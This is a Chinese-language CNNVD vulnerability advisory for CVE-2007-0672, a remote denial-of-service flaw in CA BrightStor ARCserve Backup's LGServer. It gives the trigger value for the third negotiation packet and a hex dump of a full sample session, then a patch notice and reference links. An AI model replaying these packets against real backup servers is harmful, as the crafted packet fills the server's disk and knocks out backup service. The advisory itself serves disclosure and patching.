漏洞信息详情
CA BrightStor ARCServe BackUp LGServer 安全漏洞
- CNNVD编号:CNNVD-200702-036
- 危害等级: 中危
- CVE编号: CVE-2007-0672
- 漏洞类型: 其他
- 发布时间: 2007-01-11
- 威胁类型: 远程
- 更新时间: 2021-04-08
- 厂 商: ca
- 漏洞来源: Mark Litchfield※ m...
漏洞简介
BrightStor ARCserve Backup可为各种平台的服务器提供备份和恢复保护功能。
BrightStor ARCserve Backup在处理用户请求时存在漏洞,远程攻击者可能利用此漏洞导致服务器消耗大量磁盘资源。
每次用户试图验证到LGSERVER.EXE都会在D:CA_BABLDdataServerdata ransfer中创建一个文件。该文件扩展名为.USX,格式类似于RWXXX.usx,其中X为0-9或A-F的值。
在协商期间16进制地址(DWORD)0x15到0x18上的第三个报文中值为0x00 0x00 0x00 0x00,然后是CoreDataDB。如果发送了这个报文,就会将上述内容写入到这个USX文件。但如果在0x15到0x18地址所传送的DWORD值为0xff 0xff 0xff 0x7f,就会向USX文件中写入额外2,096,153KB的NULL,导致拒绝服务。
以下为会话示例:
客户端报文1
Raw Data
4e 3d 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00 (N=, )
00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 ( )
服务端
Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
服务端
Raw Data
4e 3d 2c 1b 00 00 00 00 ff 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
客户端报文2
Raw Data
4e 3d 2c 1b 00 00 00 00 02 00 00 00 00 00 00 00 (N=, )
06 00 00 00 ce 03 00 00 52 57 31 42 34 00 ( RW1B4 )
服务端
Raw Data
4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, )
00 00 00 00 00 00 00 00 ( )
客户端报文3
Raw Data
4e 3d 2c 1b 00 00 00 00 03 00 00 00 00 00 00 00 (N=, )
ce 03 00 00 00 00 00 00 43 6f 72 65 44 61 74 61 ( CoreData)
44 42 00 00 01 00 00 00 00 00 0a 00 ce 03 00 00 (DB )
00 00 00 00 01 00 00 00 10 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 00 02 00 00 00 00 00 00 4a 00 00 00 00 00 ( J )
00 01 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( J )
00 00 4a 02 00 00 00 00 00 00 50 00 00 00 00 00 ( J P )
00 01 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( )
00 00 9a 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 ec 02 00 00 00 00 00 00 04 00 00 00 00 00 ( )
00 00 f0 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R )
00 01 42 03 00 00 00 00 00 00 0c 00 00 00 00 00 ( B )
00 00 4e 03 00 00 00 00 00 00 14 00 00 00 00 00 ( N )
00 02 62 03 00 00 00 00 00 00 04 00 00 00 00 00 ( b )
00 00 66 03 00 00 00 00 00 00 12 00 00 00 00 00 ( f )
00 02 78 03 00 00 00 00 00 00 04 00 00 00 00 00 ( x )
00 00 7c 03 00 00 00 00 00 00 0e 00 00 00 00 00 ( | )
00 02 8a 03 00 00 00 00 00 00 17 00 00 00 00 00 ( )
00 00 a1 03 00 00 00 00 00 00 11 00 00 00 00 00 ( )
00 02 b2 03 00 00 00 00 00 00 1c 00 00 00 00 00 ( )
00 00 00 00 00 00 00 00 00 00 00
漏洞公告
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp
参考网址
来源:BUGTRAQ
链接:http://www.securityfocus.com/archive/1/458653/100/0/threaded
来源:CONFIRM
链接:http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp
来源:BID
链接:https://www.securityfocus.com/bid/22339
受影响实体
- Ca Brightstor_arcserve_backup_laptops_desktops:11.0
- Ca Desktop_protection_suite:2.0
- Ca Desktop_management_suite:11.1
- Ca Desktop_management_suite:11.0
- Ca Business_protection_suite:2.0:Microsoft_sbs_standard
补丁
- CA BrightStor ARCServe BackUp LGServer 安全漏洞的修复措施
评论